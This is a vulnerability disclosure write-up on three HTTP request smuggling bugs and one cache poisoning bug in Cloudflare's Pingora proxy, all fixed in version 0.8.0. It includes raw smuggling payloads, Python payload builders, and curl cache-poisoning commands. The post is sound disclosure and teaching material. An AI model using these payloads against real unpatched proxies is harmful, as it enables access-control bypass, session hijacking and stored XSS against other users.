Breaking Pingora: HTTP Request Smuggling & Cache Poisoning in Cloudflare's Reverse Proxy

Introduction

Between December 2025 and January 2026, I found and reported multiple vulnerabilities in Pingora, Cloudflare’s open-source reverse proxy framework written in Rust. Pingora is positioned as a modern replacement for NGINX and powers parts of Cloudflare’s own infrastructure.

I found three independent HTTP request smuggling bugs and one cache poisoning vulnerability, all exploitable under Pingora’s default configuration with no special setup required. I confirmed the Upgrade header bug (Bug 1) also affects downstream projects like Pingap and Encore. The TE and cache bugs likely do as well since they’re in shared Pingora code, but I didn’t verify those specifically.

Cloudflare’s own CDN stack is protected by upstream architectural layers that prevent exploitation, but direct Pingora deployments on the internet are fully exposed.

This post covers the technical details of each bug, root cause analysis, and how they chain together. I’m also sharing some notes on the disclosure process since I think it’s useful context for other researchers.

Disclosure timeline: 85 days from first report to final patch verification. All bugs are fixed in Pingora 0.8.0. Cloudflare also published its own blog post about these issues.

Bounty: $5,000 total across all reports.

Background: How HTTP Request Smuggling Works

If you already know CL.TE/TE.CL smuggling, skip this section.

Request smuggling happens when a front-end proxy and a back-end server disagree on where one HTTP request ends and the next one begins. The attacker sends a single payload that the proxy sees as one request, but the backend interprets as two. The second “smuggled” request sits in the backend’s buffer and gets prepended to the next legitimate user’s request.

This gives the attacker control over another user’s request - they can redirect it, steal headers (cookies, auth tokens), bypass ACLs, or poison caches.

The disagreement usually comes from ambiguous handling of two headers:

- Content-Length (CL) - tells the server exactly how many bytes the body contains

- Transfer-Encoding (TE) - tells the server the body uses chunked encoding

When both are present, or when either is malformed, different implementations make different choices. That’s where smuggling lives.
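To make the disagreement concrete, here is a minimal Python sketch that frames the same bytes two ways. It is illustrative only and not taken from any real proxy; the sample bytes and function names are made up for this example. Whatever one side treats as leftover is what the other side will parse as the start of the next request.

```python
from typing import Tuple


def split_by_content_length(data: bytes, content_length: int) -> Tuple[bytes, bytes]:
    """Content-Length framing: the body is exactly N bytes; anything after starts the next message."""
    return data[:content_length], data[content_length:]


def split_by_chunked(data: bytes) -> Tuple[bytes, bytes]:
    """Chunked framing (no chunk extensions, no trailers): return (payload, leftover bytes)."""
    payload = b""
    pos = 0
    while True:
        line_end = data.index(b"\r\n", pos)      # chunk-size line ends at CRLF
        size = int(data[pos:line_end], 16)       # chunk size is hexadecimal
        pos = line_end + 2
        if size == 0:
            # The zero-size chunk is followed by an empty line that ends the body.
            if data[pos:pos + 2] != b"\r\n":
                raise ValueError("expected CRLF after last chunk")
            return payload, data[pos + 2:]
        payload += data[pos:pos + size]
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("expected CRLF after chunk data")
        pos += 2


# The same bytes, as both a front-end and a back-end might receive them as "the body".
raw = b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: target.com\r\n\r\n"

# A parser trusting a Content-Length that covers all of it sees one body, nothing left over.
cl_body, cl_rest = split_by_content_length(raw, len(raw))

# A parser trusting chunked encoding stops at "0\r\n\r\n"; the rest looks like a new request.
te_body, te_rest = split_by_chunked(raw)
```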

Bug 1: Connection Upgrade Header Bypass (CVE-2026-2833)

Report: HackerOne #3449260

Filed: December 2, 2025

Advisory: GHSA-xq2h-p299-vjwv · CVE-2026-2833

Root cause: Pingora switches to raw byte passthrough on any Upgrade header without waiting for a 101 Switching Protocols response from the backend.

The Vulnerability

When Pingora receives a request with an Upgrade header (normally used for WebSocket handshakes), it immediately switches into tunnel/passthrough mode. In this mode, Pingora stops parsing HTTP and forwards raw bytes between client and backend.

The problem: Pingora does this before confirming the backend actually accepted the upgrade. It doesn’t check for a 101 response. It just sees Upgrade and goes into passthrough.

So an attacker can:

- Send a request with an Upgrade header

- Pipeline a second request right after it in the same TCP connection

- Pingora processes only the first request as HTTP, then blindly forwards the rest as raw bytes

- The backend receives those raw bytes and parses them as a new HTTP request

The smuggled request bypasses all proxy-layer controls (ACLs, WAF rules, rate limiting, auth checks) because Pingora never sees it as an HTTP request.

┌──────────┐            ┌──────────┐            ┌──────────┐
│  Client  │            │ Pingora  │            │ Backend  │
└────┬─────┘            └────┬─────┘            └────┬─────┘
     │                       │                       │
     │ GET / HTTP/1.1        │                       │
     │ Upgrade: xxx          │ Sees: 1 request       │
     │ ───────────────       │ (switches to          │
     │ GET /admin HTTP/1.1   │  passthrough)         │
     │ ────────────────────► │ ────────────────────► │
     │                       │ Forwards raw bytes    │ Sees: 2 requests
     │                       │                       │ 1. GET /
     │                       │                       │ 2. GET /admin
     │                       │                       │    (smuggled!)

Minimal PoC

GET / HTTP/1.1
Host: target.com
Upgrade: anything
Content-Length: 0

GET /admin HTTP/1.1
Host: target.com

That’s it. The Upgrade value doesn’t matter - websocket, xxx, literally anything triggers passthrough mode. The second request reaches the backend directly, appearing to come from the proxy’s trusted IP.
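The PoC above can be sent from a short Python script against a lab deployment you control. The key detail is that both requests go out in a single write on one TCP connection, with CRLF line endings. This is an illustrative sketch: build_upgrade_smuggle and send_raw are hypothetical helper names, and the host, port, and /admin path are placeholders.

```python
import socket


def build_upgrade_smuggle(host: str, smuggled_path: str = "/admin") -> bytes:
    """Bug 1 payload: an Upgrade request with a second request pipelined right behind it."""
    first = (
        "GET / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Upgrade: anything\r\n"      # any value triggered passthrough in vulnerable versions
        "Content-Length: 0\r\n"
        "\r\n"
    )
    second = (
        f"GET {smuggled_path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "\r\n"
    )
    return (first + second).encode("ascii")


def send_raw(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Send raw bytes over one TCP connection; return whatever arrives before close or timeout."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)        # one write: both requests share the connection
        try:
            while data := sock.recv(4096):
                chunks.append(data)
        except socket.timeout:
            pass                     # keep-alive peers may never close; stop on timeout
    return b"".join(chunks)
```

For example, send_raw("127.0.0.1", 8080, build_upgrade_smuggle("target.com")) against a local test instance; only run this against infrastructure you own.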



Cross-User Impact

This isn’t just self-inflicted. I proved cross-user exploitation using two separate VPS instances with different IPs:

- Attacker sends the smuggled payload from VPS-A

- Victim sends a normal request from VPS-B (completely different IP, different connection)

- The smuggled request poisons the backend connection, and the victim’s response is affected

The backend sees the smuggled request as coming from the proxy’s internal IP, which means:

- ACL bypass - access endpoints blocked at the proxy layer

- Internal SSRF - requests appear to originate from a trusted source

- HTTP desync - response queue poisoning across users

- Session hijacking - capture victim’s cookies and auth headers

Backend logs confirmed the desync: /admin and /secret were accessed from the proxy’s internal IP, while the proxy itself never saw those requests.

Root Cause in Code

The actual root cause is in pingora-core/src/protocols/http/v1/server.rs#L797. When the session encounters an Upgrade header, it calls init_http10(), which puts the session into “pass-through” mode. This is the same close-delimited body mode exploited in the TE bugs (Bugs 2 & 3). In this mode, Pingora reads until the connection closes and forwards everything as raw bytes, including any pipelined requests.

Side note: ServerSession::into_inner() has a doc comment suggesting it’s involved in the upgrade process, but it’s not actually called as part of this code path. The pass-through behavior is triggered entirely through init_http10().

What the Patch Does

// Before: switch to passthrough immediately on Upgrade header
// After: switch to passthrough only after 101 response from backend

The patched behavior returns 400 Bad Request for the smuggled content. HTTP/1.1 pipelining is technically valid per RFC, but Pingora closes the connection by default when it encounters pipelined requests, so the smuggled content is rejected either way.

I threw a bunch of edge cases at the patch - couldn’t get past it.
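The before/after rule can be modeled as a small decision function. This is a simplified Python model, not Pingora’s Rust code; vulnerable_passthrough and patched_passthrough are hypothetical names, and a real implementation also has to relay the backend’s response to the upgrade request itself.

```python
from typing import Mapping, Optional


def _wants_upgrade(request_headers: Mapping[str, str]) -> bool:
    """True if the client sent an Upgrade header (header names are case-insensitive)."""
    return any(name.lower() == "upgrade" for name in request_headers)


def vulnerable_passthrough(request_headers: Mapping[str, str]) -> bool:
    """Behavior described for pre-0.8.0 Pingora: any Upgrade header means 'tunnel now'."""
    return _wants_upgrade(request_headers)


def patched_passthrough(request_headers: Mapping[str, str], backend_status: Optional[int]) -> bool:
    """Patched rule: tunnel only after the backend has answered 101 Switching Protocols.

    backend_status is None while no response has arrived yet.
    """
    return _wants_upgrade(request_headers) and backend_status == 101
```

The difference is timing. Under the vulnerable rule, bytes that follow the first request are tunnelled before the backend has agreed to anything; under the patched rule they are still treated as HTTP until a 101 arrives.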

Bug 2: Transfer-Encoding Comma-Separated Misparsing (CVE-2026-2835)

Report: HackerOne #3508851

Filed: January 13, 2026

Advisory: GHSA-hj7x-879w-vrp7 · CVE-2026-2835

Root cause: is_chunked_encoding() performs an exact string match on the Transfer-Encoding header value. It doesn’t parse comma-separated lists per RFC 9112.

The Vulnerability

RFC 9112 allows Transfer-Encoding to contain a comma-separated list of encodings:

Transfer-Encoding: identity, chunked

The last encoding in the list determines the framing. If “chunked” is the final value, the body uses chunked framing.

Pingora’s is_chunked_encoding() does an exact match against the string "chunked". When it sees "identity, chunked", the match fails. Pingora doesn’t recognize this as chunked encoding.
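A minimal Python sketch shows the gap between a whole-value match and a list-aware check. is_chunked_exact models the comparison described above (the lower-casing is my assumption); is_chunked_last_token is an illustrative RFC 9112-style check, not Cloudflare’s actual fix.

```python
def is_chunked_exact(te_value: str) -> bool:
    """Vulnerable pattern: compare the whole header value against 'chunked'."""
    return te_value.strip().lower() == "chunked"


def is_chunked_last_token(te_value: str) -> bool:
    """RFC 9112-style: split the coding list on commas and check the final coding."""
    codings = [c.strip().lower() for c in te_value.split(",") if c.strip()]
    # Chunked framing applies only when chunked is the last coding in the list.
    return bool(codings) and codings[-1] == "chunked"
```

Per RFC 9112, a request whose final coding is not chunked (for example "chunked, identity") has no reliable length and must be rejected with 400, so a False result here should lead to rejection rather than a fallback framing.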

Here’s what happens next. Whenever Transfer-Encoding is present, Pingora strips the Content-Length header. This is correct per RFC since TE always takes precedence over CL regardless of whether the TE value is recognized. But because Pingora also failed to recognize the TE as chunked, the request now has no recognized framing at all. If the request uses HTTP/1.0, Pingora falls back to close-delimited body mode - reads until the connection closes and forwards everything as the body.

The result looks like a CL.TE desync from the outside, but the actual mechanism is different: Pingora isn’t using Content-Length for framing (it stripped it). It’s in close-delimited mode, forwarding everything. Meanwhile, lenient backends like Node.js (Express, Fastify, NestJS) correctly parse identity, chunked as chunked encoding. They see the chunked terminator (0\r\n\r\n) and treat everything after it as a new request. That’s where the desync happens.



PoC

GET / HTTP/1.0
Host: target.com
Connection: keep-alive
Transfer-Encoding: identity, chunked
Content-Length: 29

0

GET /admin HTTP/1.1
X: 

Why HTTP/1.0? This is an attacker-controlled bypass technique, not an environmental requirement. The attacker chooses the protocol version in their request. With HTTP/1.0, Pingora triggers init_http10(), which reads the body using close-delimited mode and forwards everything, including the smuggled request.

With HTTP/1.1, Pingora doesn’t forward the body bytes the same way, so the desync doesn’t occur.

With Transfer-Encoding: identity, chunked, Pingora doesn’t recognize the chunked framing and forwards everything; the backend (Express) then returns the smuggled /admin response.
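The Content-Length: 29 in this PoC is exactly the byte length of the body as written. Building the payload in code makes that count explicit. build_te_comma_smuggle is a hypothetical helper for lab testing. The trailing "X: " line is deliberately left without a CRLF, so whatever the backend reads next is absorbed as that header’s value.

```python
def build_te_comma_smuggle(host: str, smuggled_path: str = "/admin") -> bytes:
    """Bug 2 payload: HTTP/1.0 plus 'Transfer-Encoding: identity, chunked'."""
    # Chunked terminator, then the start of a request the backend will treat as new.
    # "X: " has no CRLF, so the next bytes on the connection become this header's value.
    body = f"0\r\n\r\nGET {smuggled_path} HTTP/1.1\r\nX: "
    head = (
        "GET / HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Connection: keep-alive\r\n"
        "Transfer-Encoding: identity, chunked\r\n"
        f"Content-Length: {len(body.encode('ascii'))}\r\n"
        "\r\n"
    )
    return (head + body).encode("ascii")
```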

The Exploitation Chain

- Attacker sends the payload above from Connection A

- Pingora sees: one GET / request with a body (close-delimited, since there is no recognized framing)

- Backend (Node.js) sees: one GET / request with a chunked body (terminated by 0), followed by a new GET /admin request

- The /admin request sits in the backend’s buffer

- Victim sends a normal request from Connection B

- Victim’s request gets merged with the smuggled /admin request, and the attacker receives the victim’s response headers, cookies, and tokens
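The merge step can be simulated with plain string handling. In this sketch the victim request is invented for illustration, and parse_request_head is a deliberately tiny parser, not a real HTTP implementation. The smuggled prefix left in the backend’s buffer is concatenated with the victim’s request and parsed as one message.

```python
from typing import Dict, Tuple


def parse_request_head(buffer: bytes) -> Tuple[str, Dict[str, str]]:
    """Minimal head parser: request line plus headers up to the first blank line."""
    head, _, _ = buffer.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers


# Left in the backend's buffer after the attacker's request (from the payload above).
smuggled_prefix = b"GET /admin HTTP/1.1\r\nX: "

# A made-up victim request that happens to reuse the same backend connection.
victim = (
    b"GET /account HTTP/1.1\r\n"
    b"Host: target.com\r\n"
    b"Cookie: session=victim-secret\r\n"
    b"\r\n"
)

request_line, headers = parse_request_head(smuggled_prefix + victim)
```

The backend ends up handling a request for /admin that carries the victim’s Cookie header, while the victim’s original request line is reduced to the value of the junk X header.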

Bug 3: Transfer-Encoding Duplicate Header Handling (CVE-2026-2835)

Report: Documented within HackerOne #3508851

Identified: January 18, 2026

Advisory: GHSA-hj7x-879w-vrp7 · CVE-2026-2835

Root cause: Pingora uses .get() instead of .get_all() when retrieving Transfer-Encoding headers. When duplicate TE headers exist, only the first is checked.

The Vulnerability

This is a separate bug from Bug 2, even though the exploitation path looks similar.

RFC 9110 says that multiple headers with the same field name should be treated as if they were combined into a comma-separated list. So these two are semantically identical:

Transfer-Encoding: identity, chunked

Transfer-Encoding: identity
Transfer-Encoding: chunked

Pingora uses .get() to retrieve the Transfer-Encoding header, which returns only the first occurrence. It checks "identity" against "chunked", finds no match, and falls into the same no-framing > close-delimited > passthrough chain as Bug 2.

Meanwhile, many backends use .get_all() or equivalent, see both headers, and recognize chunked framing from the second one.
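Keeping headers as an ordered list of (name, value) pairs shows what each lookup sees. get_first and get_all_combined are hypothetical Python stand-ins for .get()/.get_all()-style lookups (in Rust’s http crate these correspond to HeaderMap::get and HeaderMap::get_all); they are not Pingora code. Combining the duplicates as RFC 9110 describes yields "identity, chunked", the same input as Bug 2.

```python
from typing import List, Optional, Tuple

# Header fields as an ordered list of (name, value) pairs, as they appear on the wire.
Headers = List[Tuple[str, str]]


def get_first(headers: Headers, name: str) -> Optional[str]:
    """.get()-style lookup: only the first field line with this name."""
    for field_name, value in headers:
        if field_name.lower() == name.lower():
            return value
    return None


def get_all_combined(headers: Headers, name: str) -> Optional[str]:
    """.get_all()-style lookup, combined per RFC 9110: values joined with ", " in order."""
    values = [value for field_name, value in headers if field_name.lower() == name.lower()]
    return ", ".join(values) if values else None


request_headers: Headers = [
    ("Host", "target.com"),
    ("Transfer-Encoding", "identity"),
    ("Transfer-Encoding", "chunked"),
]
```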



PoC

POST /legit HTTP/1.0
Host: target.com
Connection: keep-alive
Content-Length: 5
Transfer-Encoding: identity
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: target.com
X: 

Same cross-user impact. Same exploitation chain. Different root cause, different code path, different fix.

With duplicate Transfer-Encoding headers, Pingora reads only the first (identity) and misses the second (chunked); the backend then grants access to /admin.

Why These Are Independent Bugs

| | Bug 2 (Comma-Separated) | Bug 3 (Duplicate Headers) |
|---|---|---|
| Root Cause | Exact string match in is_chunked_encoding() | .get() returns first header only |
| Fix | Parse comma-separated TE list | Use .get_all() for TE headers |
| Code Path | Single header parsing | Multi-header retrieval |

Fixing one does not fix the other. Cloudflare’s patch addresses both within is_chunked_encoding_from_headers() but with distinct changes. Both bugs are tracked under CVE-2026-2835.
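The independence claim can be checked with a 2x2 matrix. One axis is how TE field lines are looked up (first only vs all); the other is how the values are classified (whole-value match vs final comma-separated token). This is an illustrative Python model; in particular, applying the exact-match check to the last field line seen is my assumption, not a description of Pingora’s code.

```python
from itertools import product
from typing import Callable, Dict, List, Tuple

Headers = List[Tuple[str, str]]


def lookup_first(headers: Headers) -> List[str]:
    """Bug 3 pattern: .get()-style, only the first Transfer-Encoding line."""
    return [v for n, v in headers if n.lower() == "transfer-encoding"][:1]


def lookup_all(headers: Headers) -> List[str]:
    """Bug 3 fix: .get_all()-style, every Transfer-Encoding line in order."""
    return [v for n, v in headers if n.lower() == "transfer-encoding"]


def classify_exact(values: List[str]) -> bool:
    """Bug 2 pattern (modeled): the last field value must equal 'chunked' as a whole."""
    return bool(values) and values[-1].strip().lower() == "chunked"


def classify_last_token(values: List[str]) -> bool:
    """Bug 2 fix: split every value on commas and check the final coding."""
    tokens = [t.strip().lower() for v in values for t in v.split(",") if t.strip()]
    return bool(tokens) and tokens[-1] == "chunked"


CASES: Dict[str, Headers] = {
    "comma": [("Transfer-Encoding", "identity, chunked")],
    "duplicate": [("Transfer-Encoding", "identity"), ("Transfer-Encoding", "chunked")],
}


def detection_matrix() -> Dict[Tuple[str, str], Dict[str, bool]]:
    """For each (lookup, classifier) pair, which attack cases are recognized as chunked."""
    lookups: Dict[str, Callable[[Headers], List[str]]] = {"first": lookup_first, "all": lookup_all}
    classifiers: Dict[str, Callable[[List[str]], bool]] = {
        "exact": classify_exact,
        "last_token": classify_last_token,
    }
    return {
        (ln, cn): {case: classifiers[cn](lookups[ln](hdrs)) for case, hdrs in CASES.items()}
        for ln, cn in product(lookups, classifiers)
    }
```

In this model only the combination of both fixes recognizes both attack cases as chunked; each fix on its own leaves the other case broken.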

Bug 4: Default Cache Key Excludes Host Header (CVE-2026-2836)

Report: HackerOne #3515245

Filed: January 18, 2026

Advisory: GHSA-f93w-pcj3-rggc · CVE-2026-2836

Root cause: CacheKey::default() generates cache keys using only the URI path, completely ignoring the Host header.

The Vulnerability

This one is different from the smuggling bugs. It’s a cache poisoning issue, but equally dangerous in practice.

When a developer enables caching in Pingora without implementing a custom cache_key_callback, the trait’s default implementation returns CacheKey::default(). This generates cache keys from the request path only. No Host. No scheme. No port.

Request to evil.com/api/data > Cache key: /api/data
Request to victim.com/api/data > Cache key: /api/data (SAME KEY)

Every major proxy/cache (NGINX, Varnish, Apache, CDN providers) includes the Host header in cache keys by default. Pingora is the exception, and it’s not documented anywhere.

Attack Scenario

Multi-tenant deployment (the most common real-world case):

- tenant-a.app.com/dashboard returns Tenant A’s dashboard

- tenant-b.app.com/dashboard returns Tenant B’s dashboard

- Both produce cache key: /dashboard

- Whoever’s response gets cached first is served to everyone

No backend bug required. No Host header injection. Just legitimate tenants with different content being served each other’s cached responses.
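A toy cache makes the multi-tenant collision concrete. path_only_key mirrors the default behavior described above; host_aware_key is a hypothetical alternative of the sort a custom cache_key_callback could produce (a real key would likely also cover the scheme). None of these names are Pingora APIs.

```python
from typing import Callable, Dict

KeyFn = Callable[[str, str], str]
Origin = Callable[[str, str], str]


def path_only_key(host: str, path: str) -> str:
    """Mirrors the default described above: Host plays no part in the key."""
    return path


def host_aware_key(host: str, path: str) -> str:
    """Hypothetical safer key: lower-cased Host (including any port) plus path."""
    return f"{host.lower()}{path}"


def make_cached_fetch(key_fn: KeyFn, origin: Origin) -> Callable[[str, str], str]:
    """Return a fetch(host, path) function backed by a dict cache keyed with key_fn."""
    cache: Dict[str, str] = {}

    def fetch(host: str, path: str) -> str:
        key = key_fn(host, path)
        if key not in cache:              # MISS: ask the origin and store its answer
            cache[key] = origin(host, path)
        return cache[key]                 # HIT, or the response just stored

    return fetch


def tenant_origin(host: str, path: str) -> str:
    """Toy multi-tenant backend whose content depends on the Host header."""
    return f"{host.split('.')[0]} content for {path}"
```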

With Host header reflection (amplification):

If the backend reflects the Host header in its response (common in redirects, CORS headers, script includes), the attack gets worse:

- Attacker sends GET /page with Host: evil.com

- Response contains <script src="https://evil.com/malicious.js"> and gets cached

- Every subsequent user requesting /page executes the attacker’s JavaScript

This turns what would normally be a low-impact, self-inflicted Host header injection into stored XSS affecting all users.
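The amplification case needs only one extra ingredient: a backend that echoes Host into the response body. A minimal sketch, assuming an invented reflecting_origin (the /static/app.js path is made up) and a path-only key as described above:

```python
from typing import Dict


def reflecting_origin(host: str, path: str) -> str:
    """Toy backend that builds an absolute script URL from the Host header."""
    return f'<script src="https://{host}/static/app.js"></script>'


cache: Dict[str, str] = {}


def fetch(host: str, path: str) -> str:
    key = path  # path-only key, as in the default described above
    if key not in cache:
        cache[key] = reflecting_origin(host, path)
    return cache[key]


attacker_view = fetch("evil.com", "/page")        # MISS: body built from the attacker's Host
victim_view = fetch("legitimate.com", "/page")    # HIT: victim gets the attacker's script tag
```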

PoC

# Attacker poisons cache
curl -H "Host: evil.com" http://target:8080/api/data

# Victim gets poisoned response
curl -H "Host: legitimate.com" http://target:8080/api/data
# Response: X-Cache-Status: HIT, content from evil.com

The Fix

Cloudflare decided to remove the default cache key generation entirely, forcing developers to define their own cache_key_callback. Right call - rather than guessing what should be in the key, make the developer think about it explicitly.

The HTTP/1.0 Close-Delimited Body: A Shared Exploitation Primitive

During Cloudflare’s investigation, their engineering team identified an important detail about Bugs 2 and 3 that I want to cover fairly.

I initially framed these as CL.TE smuggling (Content-Length vs Transfer-Encoding disagreement), but the actual mechanism is more nuanced. Here’s what really happens:

- Pingora receives a request with a malformed TE header

- Pingora doesn’t recognize the TE as chunked, but correctly strips Content-Length since TE is present (per RFC, TE always takes precedence over CL regardless of whether the TE value is recognized)

- Now there’s no recognized framing at all

- For HTTP/1.0 requests, Pingora falls back to “close-delimited” body mode - read until connection closes, forward everything

- RFC 9112 explicitly states that request bodies must never be close-delimited - only responses can use this mode

- The forwarded bytes include the smuggled request

So the full chain is: TE misparsing > no framing recognized > illegal close-delimited request body > raw bytes forwarded > backend parses smuggled request

The TE bugs create the precondition (Pingora misunderstands framing). The HTTP/1.0 close-delimited body mode provides the forwarding mechanism. Both sides are broken independently - the TE parsing violates RFC 9112, and the close-delimited request body violates RFC 9112 in a different way.

Cloudflare’s patch addresses all layers: it fixes TE parsing, removes close-delimited request body mode entirely, and adds further hardening such as disabling the CONNECT method by default and rejecting ambiguous framing.

Worth noting: Cloudflare’s engineering team confirmed during investigation that the HTTP/1.0 close-delimited body mode is independently triggerable. Sending a request with no framing headers at all triggers the same passthrough behavior, no TE misparsing required.
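The framing decision at the center of this section can be written down as a function. rfc9112_request_framing is a simplified reading of the request rules in RFC 9112 sections 6.1 and 6.3 (no trailers, minimal Content-Length validation); flawed_request_framing models the pre-fix behavior described in this post. Both are illustrative Python, not Pingora code, and the HTTP/1.1 branch of the flawed model is an assumption based on the 400 seen during triage.

```python
from enum import Enum
from typing import List, Tuple

Headers = List[Tuple[str, str]]


class Framing(Enum):
    NONE = "no body"
    CHUNKED = "chunked"
    CONTENT_LENGTH = "content-length"
    CLOSE_DELIMITED = "read until close"  # RFC 9112 allows this for responses only
    REJECT_400 = "400 Bad Request, then close"


def _values(headers: Headers, name: str) -> List[str]:
    """All field values for a header name, in order (case-insensitive)."""
    return [v for n, v in headers if n.lower() == name]


def _chunked_is_final(te_values: List[str]) -> bool:
    """True if 'chunked' is the last coding across all TE field lines."""
    tokens = [t.strip().lower() for v in te_values for t in v.split(",") if t.strip()]
    return bool(tokens) and tokens[-1] == "chunked"


def rfc9112_request_framing(version: str, headers: Headers) -> Framing:
    """Simplified request-framing rules from RFC 9112 sections 6.1 and 6.3."""
    te = _values(headers, "transfer-encoding")
    cl = [v.strip() for v in _values(headers, "content-length")]
    if te:
        if version == "HTTP/1.0":
            # 6.1: TE in an HTTP/1.0 message must be treated as faulty framing;
            # rejecting is one reasonable way to do that.
            return Framing.REJECT_400
        # 6.3: TE overrides CL; if chunked is not final, the length is unknowable.
        return Framing.CHUNKED if _chunked_is_final(te) else Framing.REJECT_400
    if cl:
        if len(set(cl)) != 1 or not (cl[0].isascii() and cl[0].isdigit()):
            return Framing.REJECT_400  # conflicting or invalid Content-Length
        return Framing.CONTENT_LENGTH
    return Framing.NONE  # 6.3: a request with no framing headers has no body


def flawed_request_framing(version: str, headers: Headers) -> Framing:
    """Model of the pre-fix behavior described in this post (illustrative only)."""
    te = _values(headers, "transfer-encoding")
    if te and te[0].strip().lower() == "chunked":  # first line only, whole-value match
        return Framing.CHUNKED
    if not te and _values(headers, "content-length"):
        return Framing.CONTENT_LENGTH
    # CL is stripped whenever TE is present, so no recognized framing remains here.
    if version == "HTTP/1.0":
        return Framing.CLOSE_DELIMITED  # the request-body mode RFC 9112 forbids
    # Assumption: HTTP/1.1 outcome based on the 400 seen during triage.
    return Framing.REJECT_400 if te else Framing.NONE
```

In this model, both TE payloads and a request with no framing headers at all land in CLOSE_DELIMITED under the flawed rules, while the RFC-based function never returns that value for a request.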

Disclosure Experience

Some notes on the triage and disclosure process. I think this stuff is useful for researchers working with big bug bounty programs.

The Triage Process

HackerOne analysts handle a massive volume of reports daily, so some back-and-forth is expected. I want to document what happened here because it’s useful context.

The first report (#3449260) took a few rounds to get through. The analyst asked me to prove cross-user impact, which is a fair ask for smuggling bugs. I provided multiple PoCs - Burp Suite evidence, a Docker-based test from a separate IP. There were some environment setup issues on their end, so I ended up spinning up a live EC2 instance they could test against directly. Triaged on December 5th.

For the second report (#3508851), the analyst tested with HTTP/1.1 instead of HTTP/1.0 and got a 400 back, which made it look like the bug didn’t work. Once I explained that the HTTP version is an attacker-controlled parameter (it’s part of the exploit, not a precondition), it got triaged quickly.

The third report (#3515245) was initially dismissed as expected behavior. The analyst referenced documentation suggesting Host was already included in cache keys, but this didn’t match the actual default code path. After I walked through the specific code flow and pointed out that their own description of “shared caching across virtual hosts” contradicted Host being in the key, it was triaged.

None of this is unusual for complex vulnerability classes. HTTP smuggling and cache poisoning aren’t straightforward to validate, and analysts are working across many programs and bug types at once. Once the reports reached the Cloudflare engineering team, the experience was excellent. Technical discussions were thorough, patches were solid, and the coordinated disclosure was handled well.

Severity Decisions

An interesting aspect of this engagement: Cloudflare kept all reports at High severity on HackerOne, rather than Critical, because their internal CDN stack has upstream architectural mitigations that prevent exploitation. At the same time, they confirmed the CVEs would be rated Critical to warn the broader Pingora community about the real-world impact on standalone deployments.

I pushed back on this, arguing that severity should reflect the impact on Pingora as a scoped product, not Cloudflare’s internal compensating controls. Cloudflare’s position was that the HackerOne severity reflects their specific risk profile, while the CVE reflects the general risk. Reasonable people can disagree here, but Cloudflare did commit to updating their program policy to clarify how severity is evaluated when their infrastructure has compensating controls but the scoped open-source product doesn’t.

For researchers: if you’re reporting vulns in open-source products maintained by large companies, be aware that internal mitigations may affect the bounty severity even when the CVE is scored higher. Ask about this early.

The TE Bug Consolidation

Bugs 2 and 3 have different root causes (exact string match vs .get() returning first header only), different code paths, and required different fixes. Even within Cloudflare’s own patchset, find_last_te_token and get_all are distinct changes. I asked twice during the process for them to be tracked separately.

The HackerOne analyst advised me to keep both in the same report (#3508851) rather than filing separately. That was a reporting decision, not a technical one, and it meant Cloudflare grouped them under a single CVE (CVE-2026-2835).

Cloudflare’s root cause analysis concluded that the core vulnerability was the structural passthrough flaw. When Pingora failed to recognize a valid framing method, it defaulted to close-delimited mode, which RFC 9112 says should never apply to requests. From their perspective, both TE parsing bugs were triggers for that single passthrough state, which is why they consolidated under one CVE.

I pushed back on this framing. Request smuggling is never one component’s fault; it exists at the parsing boundary between proxy and backend. The TE bugs are independently broken parsing behavior that widens the attack surface against any backend that interprets TE differently from Pingora, regardless of the passthrough. But I understand Cloudflare’s reasoning, and the unified fix in is_chunked_encoding_from_headers() does address both.

On bounty: Cloudflare awarded $1,500 as the base for the TE report, plus a $500 bonus recognizing the duplicate header bug as a distinct programmatic error. Fair outcome given the consolidation.

Lesson for researchers: if bugs have independent root causes and independent fixes, file them separately, even if they affect the same component. Once two bugs share a report, it’s much harder to argue for separate tracking downstream. Don’t let process convenience override the technical distinction.

Bounty

| Report | Amount |
|---|---|
| Upgrade header smuggling (#3449260) | $1,500 |
| TE smuggling - base + $500 bonus (#3508851) | $2,000 |
| Cache key poisoning (#3515245) | $1,500 |
| Total | $5,000 |

Advisories

| CVE | Title | GHSA | RUSTSEC |
|---|---|---|---|
| CVE-2026-2833 | HTTP Request Smuggling via Premature Upgrade | GHSA-xq2h-p299-vjwv | Published |
| CVE-2026-2835 | HTTP Request Smuggling via HTTP/1.0 and Transfer-Encoding Misparsing | GHSA-hj7x-879w-vrp7 | Published |
| CVE-2026-2836 | Cache Poisoning via Insecure-by-Default Cache Key | GHSA-f93w-pcj3-rggc | Published |

Impact Summary

| Bug | Type | CVE | CVE Severity | Affected Deployments |
|---|---|---|---|---|
| Upgrade Header Passthrough | HTTP Request Smuggling | CVE-2026-2833 | Critical | Any Pingora deployment with keep-alive backends |
| TE Comma-Separated Misparsing | HTTP Request Smuggling | CVE-2026-2835 | Critical | Pingora + Node.js/lenient backends |
| TE Duplicate Header Handling | HTTP Request Smuggling | CVE-2026-2835 | Critical | Pingora + Node.js/lenient backends |
| Default Cache Key Missing Host | Cache Poisoning | CVE-2026-2836 | High | Any Pingora deployment with caching enabled |

All bugs exploitable under default configuration. No non-default settings required. No authentication needed. Low attack complexity.

Cross-user impact proven for all smuggling bugs via separate VPS instances over the public internet.

Fixed Versions

All bugs are fixed in Pingora 0.8.0.

Timeline

| Date | Event |
|---|---|
| Dec 2, 2025 | Reported Upgrade header smuggling (#3449260) |
| Dec 5, 2025 | Bug 1 triaged after live instance provided |
| Jan 13, 2026 | Reported TE comma-separated smuggling (#3508851) |
| Jan 14, 2026 | Bug 2 triaged |
| Jan 18, 2026 | Identified TE duplicate header bug, reported within #3508851 |
| Jan 18, 2026 | Reported cache key poisoning (#3515245) |
| Jan 19, 2026 | Bug 4 triaged |
| Jan 29, 2026 | Received and verified patch for Bug 1 |
